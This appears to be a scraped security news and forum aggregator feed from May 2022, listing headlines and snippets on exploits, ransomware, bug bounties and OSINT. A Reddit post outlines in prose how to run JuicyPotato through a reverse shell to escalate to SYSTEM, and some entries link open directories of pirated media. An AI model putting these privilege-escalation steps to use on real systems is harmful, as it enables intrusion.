    FreeBuf Morning Report | Hackers broadcast anti-war video on Russia's parade day; hackers hide malware in Microsoft event logs
    Right during Russia's military parade, the TV programme-listing system was hacked and the parade programme was replaced with anti-war messages; the attack affected several major online TV services.
    Exploit developed for critical RCE vulnerability in F5 BIG-IP products
    Global security firm Positive Technologies has developed exploit code for CVE-2022-1388 in F5 BIG-IP products.
    Radio security offence and defence: GPS location hijacking
    Radio security offence and defence: GPS location hijacking.
    Lao Zhao on Security series: scraping UNICOM FocalPoint data and reflections on secure programming
    FocalPoint enables product and portfolio management based on market demand and business objectives.
    Xiaoyou Technology: five layers of risk troubling cloud-native security | New Forces in Cybersecurity SOLO launch season
    Where are cloud-native security risk management and security architecture design heading? Xiaoyou's technical director tells you!
    After the Conti attack, Costa Rica declares a state of emergency
    After multiple government agencies were hit by cyberattacks from the Conti ransomware group, Costa Rican President Rodrigo Chaves declared a national state of emergency.
    CERT-UA warns of malicious spam distributing the Jester info-stealer
    Ukraine's Computer Emergency Response Team (CERT-UA) has detected a malicious spam campaign.
    Analysis of "Transparent Tribe" attacks on India using smuggling-intelligence-themed lures
    Transparent Tribe dates back to at least 2012, and this APT group has continuously targeted Indian military and government personnel.
  • Open

    NPM Vulnerability Discussion on Twitter
    Article URL: https://www.solipsys.co.uk/Chartter/1523831884786151424.svg Comments URL: https://news.ycombinator.com/item?id=31325154 Points: 131 # Comments: 185
  • Open

    Misconfigured Rate Limit in Sending Notifications to the Victims Phone Via the Endpoint " /faxes/inbox "
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1482919
  • Open

    Analysis of the F5 BIG-IP unauthenticated RCE (CVE-2022-1388)
    Authors: Knownsec 404 Lab kuipla, Billion Date: 2022-05-10. On 2022/5/4 F5 published a security advisory about an unauthenticated RCE in BIG-IP (CVE-2022-1388); the official description of the vulnerability is "Undisclosed requests may bypass iControl REST authentication." The remediation section mentions that older versions can take non-Connection:k...
    Protected Process Light (PPL) Attack
    Author: Li Mu Original link: https://mp.weixin.qq.com/s/Vp0UmGuGl_O2L4blUiHhSw Background on PP/PPL(s): First, PPL stands for Protected Process Light, but before that there were only Protected Processes. The concept of protected processes was introduced with Windows Vista / Server 2008, and its purpose was not to protect your data or credentials. Its original goal was...
  • Open

    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on System Weakness »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
  • Open

    Ossuaries and Catacombs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    pictures of grease
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Any directories with First 48 episodes?
    submitted by /u/kevinc2c1 [link] [comments]
  • Open

    Start an analysis by looking for the Robots.txt
    In order for search engines such as Google, Bing, DuckDuckGo to present their results for search terms, it's necessary that information… Continue reading on Medium »

  • Open

    Grizzly.fi Token Forcible Minting
    In early April, our whitehats izhuer and Gwinhen from Pwned No More (PNM) reported a critical bug to the bug bounty program of Grizzly.fi. Continue reading on Medium »
    Why you should never trust any website
    Hello Everyone. Today I have an interesting story about a target that I have done some pentesting on. The result will shock you Continue reading on Medium »
    The Basics of Subdomain Takeovers
    A subdomain takeover is a vulnerability which allows an attacker to take the control of a subdomain which is not owned by that attacker. Continue reading on Medium »
    Bug Bounty Career: Web Hacking
    Details Continue reading on Medium »
    The Linuxless recon for bug bounty beginners who can’t code
    When I started doing bug bounties almost 2 years ago I saw this legendary video by tomnomnom and STÖK and thought it was sheer magic. Two… Continue reading on Medium »
    AppSec Tales VI | 2FA
    Application Security Testing of the 2FA form guidelines. Continue reading on System Weakness »
  • Open

    Global default settings page is accessible to non-administrators
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563139 - Bounty: $300
    Slowvote and Countdown can cause Denial of Service due to recursive inclusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563142
  • Open

    San Diego CTF 2022 — Part Of The Ship…
    Category: OSINT  Difficulty: Easy  Challenge Author: Blarthogg  Team: OsirisProtocol (https://ctftime.org/team/151343/#.Ynh0zJJAj_s.link) Continue reading on Medium »
    War in Ukraine / May 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    The Cyber Institute — OSINT Challenge 3
    Hi everyone;  Here I go with a write up of my third challenge from the course OSINT Challenge developed by The Cyber Institute.   The main… Continue reading on Medium »
    War in Ukraine / May 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    reconDNS
    It was also developed with the aim of automating and facilitating the work of cybersecurity professionals. Continue reading on Medium »
  • Open

    Hackers are actively exploiting BIG-IP vulnerability with a 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/hackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31319852 Points: 14 # Comments: 3
  • Open

    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Dev Genius »
    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Medium »
    FFUF (Fuzz Faster U Fool)
    Currently, in the CTFs and walkthroughs I am doing, whether on Hack The Box or on TryHackMe, when I need to do web fuzzing… Continue reading on Medium »
  • Open

    Next steps into entering the field
    So I graduated last year with a degree in Digital Forensics and Information Assurance. A month before graduation I landed a job doing IT help desk support for my city. We do a massive range of things from running cable, to troubleshooting and resolving network issues, to other general IT stuff. I’ve even been working on getting an IR plan developed and put into place with the City I work for. It’s great experience and I’m really liking it but I do believe that I need to look into getting into my specific field within the next couple of years. My question is, will this IT job help me with finding an IR/SOC type job in the future experience wise, and what jobs should I be looking for in order to get into the field (entry level positions and such). Mainly just deciding how much time I should actually spend in this position where it won’t be a big waste of time career wise. I’m always learning new things, but I also know the job is not directly in the career path I’m pursuing. submitted by /u/brinkv [link] [comments]
    The Case of the Disappearing Scheduled Task
    Good morning, It’s time for a new 13Cubed episode! This one is based upon a Microsoft Detection and Response (DART) blog post (see Resources section). I, along with two of my colleagues (Johnathan Sykes and Meaghan Bradshaw), performed extensive research regarding two different methods by which it is possible to create "hidden" Scheduled Tasks. While one of the methods has been discussed before, this research shows how it might be leveraged by a Threat Actor. The second technique, as best we can tell, is novel. Episode: https://www.youtube.com/watch?v=xrd0w505aS8 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
    GCFA practice exam giveaway.. anyone
    Hi All, Just checking if any veteran can help me out with an extra GCFA practice exam give away. Recently failed it and reappearing :) submitted by /u/Mushroom-Fuzzy [link] [comments]
  • Open

    Learning Linux kernel exploitation – Part 2 – CVE-2022-0847
    Article URL: https://twitter.com/0xricksanchez/status/1523633205630619648 Comments URL: https://news.ycombinator.com/item?id=31316513 Points: 3 # Comments: 0
    F5 BIG-IP RCE exploitation (CVE-2022-1388)
    Article URL: https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html Comments URL: https://news.ycombinator.com/item?id=31316045 Points: 2 # Comments: 0
  • Open

    Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
    submitted by /u/SCI_Rusher [link] [comments]
    Vulnerability Analysis - CVE-2022-1388 - Randori
    submitted by /u/zxcvqwerpl [link] [comments]
    POC for CVE-2022-1388
    submitted by /u/scopedsecurity [link] [comments]
    Expanding on Existing IoCs to Leverage Immediate Threats Simulations
    submitted by /u/bayhitlaw [link] [comments]
  • Open

    SecWiki News 2022-05-09 Review
    [D3FEND] An interpretation of the cybersecurity countermeasure knowledge graph framework by ourren; SecWiki Weekly (Issue 427) by ourren; From a 500 error to account takeover by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    Windows Recon: Host Discovery
    Hello, today I will show you some of the ways in which we can perform host discovery in Windows. Continue reading on Medium »
    Red, Blue & Purple Team: Attacker, Defender & Facilitator
    Introduction:  Building an effective & secure platform is critical! In this era of rising technologies, it is becoming more and more… Continue reading on Medium »
    Malicious PDF Generator
    Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh Continue reading on Medium »
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    What to do if you receive a strange email with random letters and numbers?
    I have received this morning an email coming from "Veronika Mccreadie" and the problem is: It appeared in my main page instead of spam. It has only random numbers and letters in the whole email. It has something attached. So I need to know what to do with this. I haven't even opened it just in case it can do anything hahaha yeah, I'm that paranoid. submitted by /u/chem_OS [link] [comments]
  • Open

    FreeBuf Morning Report | HiPhi cars embroiled in privacy-leak controversy; Musk's Twitter acquisition may face a security review
    According to reports, HiPhi cars' dashcams can receive signals from other HiPhi cars through the owner-connect feature and read the contents of those cars' dashcams.
    New variant of BlackByte ransomware appears, written in Go
    BlackByte is a fully featured ransomware family that attacks using multiple techniques and continually updates its samples, which may pose a significant threat to organisations' data security.
    How to unpack malicious Python executables
    How to recover source code from a packaged Python program and improve analysis efficiency?
    US announces sanctions on Blender for laundering money for North Korean hackers
    The US Treasury said Lazarus has laundered more than 20.5 million USD through Blender and formally announced sanctions on the cryptocurrency mixing service provider Blender.
    Google Play suspends paid-app downloads and updates for Russian users
    Google will bar Russian users and developers from downloading or updating paid apps from the Google Play store.
    Lazarus arsenal update: analysis of recent Andariel attack samples
    The Andariel group mainly attacks South Korean organisations, especially financial institutions, for financial gain and cyber espionage.
    Note: NIST has updated its cybersecurity supply chain risk guidance
    The guidance covers trends and best practices related to supply chain attacks, directing enterprises on effectively managing software supply chain risk and on how to respond when hit by a supply chain attack.
    US agricultural machinery manufacturer AGCO hit by ransomware attack
    AGCO recently announced that it suffered a ransomware attack that affected some of its production facilities.
    US offers a 15 million USD reward for information on key members of the Conti ransomware gang
    To help identify and locate the core members and accomplices of the notorious Conti ransomware gang, the US State Department has offered a 15 million USD reward.
    First episode of "New Forces in Cybersecurity" goes live, with memorable quotes throughout the Solo launch season
    Chen Kunpeng, CEO of Beijing Yiyun Technology, was the first guest, sharing on a real-name data access security mesh.
  • Open

    Japanese ASMR ear licking videos and audio works.
    submitted by /u/MrRoboto12345 [link] [comments]
  • Open

    JBoss EAP/AS <= 6.* RCE and RPC echo
    Author: Y4er Original link: https://y4er.com/post/jboss-4446-rce-and-rpc-echo-response/ Saw a JBoss 0day RCE posted on Twitter, so let's analyse it. Preface: this bug was a talk at the Alligator Conference 2019 abroad; the slides are here https://s3.amazonaws.com/files.joaomatosf.com...
  • Open

    Fuzzing
    Hello all, I'm new to exploit development and I was wondering what common tools are used to fuzz GUI applications. All the tutorials I have seen are used to fuzz command line applications. Thanks. submitted by /u/PuzzledWhereas991 [link] [comments]

  • Open

    Career in computer forensics pretty much over.. need some advice/support (more details in post)
    Hey all, long time lurker here. I’ve been in computer forensics for a bit now and loving it. But sadly something has happened recently that has well, shot my career in this field in the head. Quick background, I work in a state police child exploitation unit (won’t say exactly where, but western states and the weather is beautiful right now) doing forensics. Without getting into any details, it came about that not only myself but 15+ others I know were victimized when we were in middle school. It gets worse than that but that’s the spark notes. To say it’s been traumatic is an understatement. I haven’t been to work in a few weeks and I’ve had a chat with my boss and we both agree it’s not a job I can keep doing. I gotta chase down a bunch of stuff and I’m trying my best to take care of myself (seeing a therapist, gone straight edge, working with my doc, thank god for health insurance lol) but shits been rough man. Has anyone seen or experienced something similar? Any advice? Most importantly, computer forensics isn’t something I’m likely to have the capacity to do moving forwards given my mental state (worried about PTSD). Do you know of any fields with an easy lateral transition or transferable skill sets? I’ve been thinking of cyber security if I can swing it, but I’d rather stay gov’t if I can for the benefits as I’ll need them. submitted by /u/59472993757 [link] [comments]
    A starter's guide on recovering damaged and rotten CDs
    TL;DR: I'm using ddrescue/dvdisaster/testdisk and photorec to recover data from a disc-rotten CD. A prettier version of this post is available here. The First Hurdle: Reading data from a Damaged CD / DVD. The first problem anyone with a damaged disc is going to encounter is that they cannot copy files from it using a regular copying mechanism (e.g. file explorer, terminal commands). This is due to the fact that normal file copying mechanisms will not attempt to read from a bad sector or unreadable data. Instead, they will freeze, or throw an error upon encountering such data. To recover data from a damaged medium, we need specialized tools that are aware of this problem and will continue with the reading process, even after encountering errors. Three such tools are ddrescue, dvdisast…

    Email Spoofing due to Invalid SPF Record Vulnerability
    Supp Folks! Continue reading on Medium »
    How I Paid For My Holiday With Bug Bounty
    Today I am detailing how I was able to afford a holiday utilising Bug Bounty only. Continue reading on Medium »
    P1 Bug — PII information disclosure
    Hello amazing penetration testers and bug bounty hunters, I hope you all are fine ❤ In this blog I will be explaining the bug that I… Continue reading on Medium »
    Can analyzing javascript files lead to remote code execution?
    In today’s blog, I’m going to show you how analyzing javascript files can lead to access unrestricted endpoints and to understand how the… Continue reading on Medium »
    How to Find bugs on Dutch Govt……..!
    I have posted my swag on social media etc., so I'm getting lots of DMs asking how we can find vulnerabilities (bugs) in Dutch govt sites, what can be the… Continue reading on Medium »
    Nmap Basic commands — 1
    Introduction Continue reading on Medium »
    Dockerize your hacking workflow
    I’ve been a fan of containerization for a long time. I do not want to create a flame post; all I want to say is that there are situations… Continue reading on Medium »
    HTML Injection Web Application Vulnerability : Introduction Part
    What Is HTML Injection? Continue reading on Medium »
    What happened to me
    Today I will write about one of my recent findings which lead to a $4000 bounty issue. I will publish at 11 PM IST. Continue reading on Medium »
    Worst Bug bounty sites you should avoid
    Hi Hunters! Continue reading on Medium »

    What positions should a self-taught developer with 3 years experience in IT security apply to?
    Hi all, I have 3 years IT security experience (mix of auditing/compliance/user support) for a major company, and I am a self-taught developer (MERN stack). I have a degree unrelated to CS. I'm having trouble figuring out what positions to apply to. If I apply to web development positions, they don't seem to care about my IT/security background at all. It's basically just how well I know their (exact) stack. If I apply to security engineering positions, they seem to care more about what certs I have, networking knowledge, and things of that nature, and my programming skills don't seem as relevant. It feels like I'm not a perfect fit for either position. There must be a job title/position that utilizes my specific background. I'm curious about specific job titles and roles. submitted by /u/C4KggxcEJlTefYKisLJE [link] [comments]
    Transfer 2FA Tokens from GAUTH to Authy?
    Is this possible? I can duplicate the tokens to another instance of GAUTH, for example on a 2nd smartphone, via QR codes. Can I also duplicate or export/import those tokens from GAUTH to Authy? All I'd have to do is export the secret and type it into Authy. But does the QR code generated by GAUTH contain the secret? Thx for enlightening me. submitted by /u/junghansmega4 [link] [comments]

    Mac Software, Images, Videos, and much more
    submitted by /u/ilikemacsalot [link] [comments]
    Music?
    Is music now off the table? Haven't seen any new posts for a while. submitted by /u/Top-Nefariousness908 [link] [comments]

    SecWiki News 2022-05-08 Review
    Smart meter security: communication analysis by ourren; OffensiveNotion: Notion as a platform for offensive operations by ourren. For more of the latest articles, visit SecWiki.

    HintInject
    Embedding shellcode into the PE Hint/Name Table https://github.com/frkngksl/HintInject submitted by /u/DarkGrejuva [link] [comments]

    I started a newsletter and would love your feedback
    submitted by /u/nunorbatista [link] [comments]

    Good News Roundup: the OSINT-inspired Geek Edition
    Today’s Good News Roundup has OSINT news, AI and robotics breakthroughs for health & human rights, & news about the Navalny app in Russia Continue reading on Medium »
    The Future of the Internet — METINT & METfluence?
    What is the future of OSINT, cyber HUMINT, and online influence? One only needs to look at Mark Zuckerberg, who decided to rebrand Facebook —… Continue reading on Medium »
    NahamCon CTF 2022: OSINT Challenge
    NahamCon CTF 2022 is a gamified cyber security event and part of free virtual security conference Hosted by STOK, John Hammond and… Continue reading on Medium »
    Web Archive as an OSINT Tool
    Using web archives allows you to see what a web page or site looked like in the past. Most popular web archives: https://archive.org/… Continue reading on Medium »
    War in Ukraine / May 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    SPY NEWS: 2022 — Week 18
    Summary of the espionage-related news stories for the Week 18 (1–7 May) of 2022. Continue reading on Medium »

    Reflected xss in https://sh.reddit.com
    Reddit disclosed a bug submitted by abhiramsita: https://hackerone.com/reports/1549206 - Bounty: $5000

    IDOR: a simple and very dangerous vulnerability
    Hello guys! Continue reading on Medium »
    Everything you need to know about LSASS (From Red Team Perspective)
    If you open Task Manager in your windows, you will see a process running called ‘lsass.exe’. LSASS (Local Security Authority Server… Continue reading on Pentester Nepal »
    Everything you need to know about LSASS (From Red Team Perspective)
    If you open Task Manager in your windows, you will see a process running called ‘lsass.exe’. LSASS (Local Security Authority Server… Continue reading on Medium »

    Hiding Your EXE In Alternate Data Streams
    submitted by /u/Diesl [link] [comments]

    How advanced are (photo) image forensics at present?
    I am not in this field; I am a photographer/software person. I've been researching image forensics, but haven't quite got a straight answer on this: Is it plausible or even possible for someone to take a photograph with a digital camera, make edits to that photograph that make non-trivial changes to its appearance, and then hide these adjustments through technical skill, software designed for such a job or otherwise fudging EXIF info etc, resulting in an image that can't be identified as fake with forensic analysis, be it automated tools or even someone literally checking each block of data? submitted by /u/MonstrousPourings [link] [comments]

    What caused Psychic Signatures Vulnerability (CVE-2022-21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview

    Code4rena — First 1M$ stats
    After 14 months of grinding Code4rena audit contests I’m the first person to hit 1M$ in awards and take the number one spot on the… Continue reading on Medium »
    Text Based Injection | Content Spoofing on ISRO Website
    Content spoofing, also referred to as content injection, “arbitrary text injection” or virtual defacement, is an attack targeting a user… Continue reading on Medium »
    The $16,000 Dev Mistake
    Hello all! Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : Prevention Part
    Prevention Continue reading on Medium »

    Mr.Holmes — Osint Tool
    Mr.Holmes is an information gathering (OSINT) tool. Its main goal is to obtain information about domains, usernames and… Continue reading on Medium »
    Intelligence Gathering with Open-Source Tools
    Intelligence gathering is becoming increasingly important to organizations today. Continue reading on Medium »
    Collection of data about companies in Russia and around the world
    Today we will study publicly available sources that can be used to study Russian and foreign counterparties, as well as assess their… Continue reading on Medium »
    What would OSINT be without… OSINT?
    The title is absolutely not meant as clickbait, but it is at least a little provocative. For anyone who comes across the results of a… Continue reading on Medium »
    War in Ukraine / May 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »

    Storing Decryptable Passwords in DB for Automation Usage
    TLDR I am making a REST Session management solution for industrial automation purposes and need to automatically log into devices to perform configurations. NOTE: These devices are 99% of the time going to be isolated to private networks/VPNs (i.e., will not have a public IP). Dilemma I am being tasked with creating a service that can store hardware device credentials so automated configurations (& metrics scraping) can be done. The hardware in question only allows REST Session logins via a POST method where the user and (unencrypted) password are sent in the message body. This returns a Session cookie that my service then stores (in memory). The service in question consists of a Linux (Ubuntu 20.04) server running: FastAPI python backend, SQLite3 embedded file DB. Storing Credentials? My background is not in Security so this is all very new to me, but it seems that I should prefer storing a hash (e.g., bcrypt) of my password in my DB for future verification; however there will not be any future verification as this is all automated. This brings me to what seems like the only solution - hashing the password and using that (somehow) to seed the password encryption, then storing the hashed password & encrypted password in the DB for decryption purposes later. I know this provides almost 0 security given the DB is compromised but I am at a loss for alternate solutions. Given the DB is embedded, maybe there is some added assurance that the server itself would have to be compromised before the DB itself is compromised? I don't know if there is a technical "right" approach to this, maybe not, however if anyone has any advice I am all ears. NOTE: I do not control the authentication type for the devices my service has to authenticate to. User/Pass Session-based auth is the only way atm so JWT or token-based auth is out of the question submitted by /u/jmehrs [link] [comments]
    Trying to run JuicyPotato through a PowerShell script, but I get "recv failed with error: 10038"
    I have a reverse-powershell session to a Windows Server 2016 VM as the built-in IIS user (nt authority\iusr), and since the OS is vulnerable to this exploit, I'm trying to run JuicyPotato to execute a bat file as SYSTEM. However I am facing a problem: it looks like I can't create new processes, so uploading the exe and running it through my shell is not an option. The way I decided to solve this problem is by using the process I already have, the reverse powershell process. So I converted JuicyPotato into a DLL that exports the main() function, and I wrote a small PowerShell-compatible C# script that P/Invokes it and executes the exploit. But when I try to run it, I get the following error: COM -> recv failed with error: 10038 I know for a fact that using this exploit through PowerShell is possible, because I've tried it in a second VM with Defender disabled and it worked. I also know that the target system can create TCP listeners as the iusr user (the error seems to be a socket error), because that's how I have a fully functional reverse shell. So what gives? Looking at JP's source code, it looks like it failed to read from a TCP listener socket for some reason, but I don't understand why. Recreating this scenario for testing is very simple: Create a VM with Windows Server 2016 Datacenter Edition Configure IIS with PHP Make sure that Defender is enabled Drop a reverse-shell PHP script into wwwroot and connect to it Upload my modified JuicyPotato DLL and the ps1 script that runs it, or create your own by downloading the JP source code, change the output type to DLL and add this function to it. Run the ps1 script through your remote shell Any help is appreciated. submitted by /u/Sparky2199 [link] [comments]
    Offensive security, remote US jobs for an EU dude
    How feasible or likely is to find a job in US offsec sector (possibly remote) for someone who lives in Germany of EU citizenship? EDIT: Thanks everyone for all your answers, they are pretty much what I expected. Thinking of a mid-career transition into infosec from software engineering within next couple of years, so I walk around asking different infosec groups, perhaps stupid questions, but I wanted to make sure that I see all opportunities and all consequences of going for this change. submitted by /u/andy-codes [link] [comments]

    Huge amount of Movies, TV Shows, and other Videos
    http://203.96.191.70/Data/ Has been posted before, but its back online again. submitted by /u/amritajaatak [link] [comments]
    A lot of nostalgia Flash games (fast download speed too)
    http://mahergames.ru.ma/uploads/ submitted by /u/Pelicaros [link] [comments]

    SecWiki News 2022-05-07 Review
    Building an automated anime-tracking system with Sonarr by ourren; flybirds: a natural-language-based, cross-platform, cross-framework BDD UI automation testing solution by ourren; A first look at Java security: JavaAgent by SecIN社区; supplier: a roundup of offensive vulnerabilities in mainstream vendors' products by ourren. For more of the latest articles, visit SecWiki.

    Default Credentials Cheat Sheet
    One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password Continue reading on Medium »

    XXE from 0 to 1
    As an extensible markup language, XML is used to read/write data in virtually any application and has become a common language for data exchange.
    US Commerce Department agency recommends how to generate the software supply chain's "ID card"
    This manual outlines the process for generating a Software Bill of Materials (SBOM) and how software suppliers should provide them.
    Exploring the principles behind MSSQL privilege escalation
    This article analyzes the principles behind these privilege escalation methods and summarizes them; corrections from readers are welcome wherever something is inaccurate.
    Jixing Lab (戟星实验室) tools series: anyone can become a "weak password master"
    blaster is a powerful weak-password risk detection tool for checking website logins for weak passwords.
    hackmyvm series 8: REI
    This article is for technical discussion and learning only; do not use it for illegal purposes. Any illegal use is unrelated to the author!
    APT attacks from the defender's perspective
    This article divides APT defense methods into three categories, monitoring, detection and mitigation techniques, and reviews each in turn.
    Researchers warn: "Raspberry Robin" may be spreading via external drives
    Cybersecurity researchers recently discovered a new Windows malware with worm-like capabilities.
    "Cybersecurity Standards Practice Guide: Technical Specification for Certification of Cross-Border Personal Information Processing Activities (Draft for Comment)" released
    The Practice Guide sets out requirements covering basic principles, the obligations each party must follow in cross-border processing activities, and protection of the rights and interests of personal information subjects.
    Ukraine's IT Army and Anonymous keep attacking Russian entities
    The Anonymous hacker collective, together with Ukraine's IT Army, continues to launch cyberattacks against Russian entities.
    QNAP patches critical QVR remote command execution vulnerability
    QNAP has published several security advisories.
    FreeBuf Weekly | DNS vulnerability affects millions of IoT devices; attackers hijack UK National Health Service email accounts
    Happy weekend, FreeBufers! Here is this week's FreeBuf Weekly.
    FreeBuf Morning Report | Xbox outage worldwide; IKEA Canada discovers data breach
    Microsoft said Xbox Live services were down due to a major outage, leaving customers in many regions worldwide unable to launch or purchase games.
    Nvidia fined $5.5 million for failing to disclose the impact of crypto mining on its business
    Nvidia admitted it failed to adequately disclose the impact of crypto mining on its gaming business and agreed to pay a $5.5 million penalty to the US Securities and Exchange Commission.
    What is an IP conflict and how do you resolve it?
    An IP address conflict occurs when two or more devices on the same network are assigned the same IP address.
    Companies announced for the Cybersecurity New Forces Solo Launch Season; setting sail at 10 AM on May 9!
    Nine companies officially announced; see you next Monday at the Cybersecurity New Forces Solo Launch Season!
    Enterprise data security through the lens of "The Wind Blows from Longxi"
    The "Three Kingdoms plus espionage" TV drama "The Wind Blows from Longxi" (风起陇西) is currently airing. On a battlefield where the realm is split three ways and war rages everywhere, there are not only clashing blades; the contest of secret intelligence also surges in the shadows of the tide.
    [Star Classroom] Quick start: how to build a network intrusion detection system with Suricata?
    Suricata is a free, open source, mature, fast and robust network threat detection engine.

    Exploiting IRCTC along with few other government domains through XXE
    submitted by /u/rotoutjog [link] [comments]

    Pwn2Own Austin 2021 Cisco RV34x RCE vulnerability analysis
    Author: f-undefined team, f0cus7. Original link: https://mp.weixin.qq.com/s/sxj7Yn9m2JolLkuP1BGc5Q. Throughout last year the Cisco RV34x series was hit by a series of vulnerabilities. After multiple rounds of patching, at the end of the year at Pwn2Own Austin 2021 this router series was still compromised by IoT Inspector Research Lab; specifically, three logic vulnerabilities were chained to achieve R...

    Fuzzing ClamAV with real malware samples
    Article URL: https://mmmds.pl/clamav/ Comments URL: https://news.ycombinator.com/item?id=31291190 Points: 2 # Comments: 0

    KaijuKingz P2E Bug Bounty
    Introduction Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : File Inclusion Part
    File Inclusion Continue reading on System Weakness »
    Remote Code Execution Web Application Vulnerability : File Inclusion Part
    File Inclusion Continue reading on Medium »
    I Hacked all of the School Websites in my Town.
    So let’s begin the BLOG. When I got admission to my college, I noticed that my school had a website. As a Website Pentester and a Curious… Continue reading on Medium »
    How We hacked (bypassed) Admin Panel just by Js file
    Hello world! Continue reading on Medium »
    2FA Bypass in PickMyCareer.in
    I found a 2fa bypass recently in a responsible disclosure program — pickmycareer.in . Continue reading on Medium »
    Zero-day vulnerability and money
    A simple definition would be that a zero-day vulnerability is a vulnerability in a system or device that is not yet patched. An exploit… Continue reading on Medium »
    Chained Bug: XML File Upload to XSS to CSRF to Full Account Take Over (ATO)
    Hello Community, today I’m gonna share my experience about how I was able to chain some vulnerabilities into Full Account Take Over… Continue reading on System Weakness »
    Chained Bug: XML File Upload to XSS to CSRF to Full Account Take Over (ATO)
    Hello Community, today I’m gonna share my experience about how I was able to chain some vulnerabilities into Full Account Take Over… Continue reading on Medium »

    digital forensics..help
    Hey guys and gals. Years ago I was taking online classes for digital forensics... Never finished due to personal family issues.. had a two year old at the time and was working two jobs, going to class at midnight, one in the morning was really starting to take its toll... As the years have passed and my son is finally older I'm really thinking now is the time that I finish what I started... However I went to DeVry and they are currently under lots of fire... Could anyone recommend a free or relatively inexpensive online certification class or something that I could take to dip my toes back in the water?! Thank you in advance!! submitted by /u/Ok-Acanthaceae-4568 [link] [comments]
    Specifying GPG Decryption Key
    I'm working on a digital forensics project involving data recovery. Suppose I have the encryption key (not the passphrase, the actual key) for a file encrypted with GPG symmetric encryption and the encrypted file. How could I go about decrypting the file? Is there a way to specify the use of a specific key for GPG decryption instead of a passphrase? I've considered just trying to decrypt the file content with Python, but GPG uses its own variant of CFB mode, making this a somewhat complicated endeavor. submitted by /u/metal_oarsman [link] [comments]

    Multiple IDORs in family pairing api
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1286332 - Bounty: $7500
    SQL injection in URL path processing on www.ibm.com
    IBM disclosed a bug submitted by asterite: https://hackerone.com/reports/1527284
    Able to bypass email verification and change email to any other user email
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1551176 - Bounty: $5000

    Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding
    Cobalt Strike’s metadata encoding algorithm contributes to its versatility and usefulness for red teams and threat actors alike. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding appeared first on Unit42.

    Home-Grown Red Team: Creating A Red Team Development Workstation
    Having a good red team development workstation is essential for creating payloads, testing out new tools and keeping your work organized… Continue reading on Medium »
    My eCPPT journey
    Since I passed my eJTP in October, I decided to continue with INE and go for eCPPT(which can help for my oscp). Continue reading on Medium »
    Container breakout: CAP_SYS_ADMIN via Creating a cgroup
    Prerequisites: Continue reading on Medium »

    Any ideas on how to search ODs for Shopify themes?
    They come in a zip file and always have these subfolders: assets, config, layout, locales, sections, snippets, templates. I don't know how I can narrow my search to those parameters, anyone know? submitted by /u/Loli_of_Bread [link] [comments]

    SecWiki News 2022-05-06 Review
    Several ways a domain controller gets compromised by ourren; A general unhooking method for custom jump functions by SecIN社区. For more of the latest articles, visit SecWiki.

    Rubygems CVE-2022-29176 explained
    Article URL: https://greg.molnar.io/blog/rubygems-cve-2022-29176/ Comments URL: https://news.ycombinator.com/item?id=31285049 Points: 2 # Comments: 0

    CloudFlare Pages, part 1: The fellowship of the secret
    submitted by /u/albinowax [link] [comments]
    Fuzzing ClamAV with real malware samples
    submitted by /u/mmmds [link] [comments]

    Old age as a catalyst for terror
    “Growing old isn't so bad when you consider the alternative” Continue reading on Medium »

    Check and locate phone number in OSINT
    The first thing to do to identify a phone number is to establish its belonging to the region and telecom operator, and also to check its… Continue reading on Medium »
    OSINT: Do I have to Capture The Flag(CTF)? Pt1.
    Maybe I'll plant one instead! — make your own CTF Continue reading on Medium »
    War in Ukraine / May 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    CyberSoc | Cyber Investigator CTF Writeup
    This CTF was created by Jack T at CyberSoc, the Cyber Security Society at Cardiff University. It is a playground for those who love… Continue reading on Medium »

    "Beijing Digital Economy Full-Industry-Chain Opening Action Plan (Draft for Comment)" released; the value of data as a factor of production is key
    To implement the municipal Party committee and government's strategic deployment to accelerate building Beijing into a global digital economy benchmark city, the Beijing Municipal Bureau of Economy and Information Technology has drafted the "Beijing Digital Economy Full-Industry-Chain Opening Action Plan (Draft for Comment)".
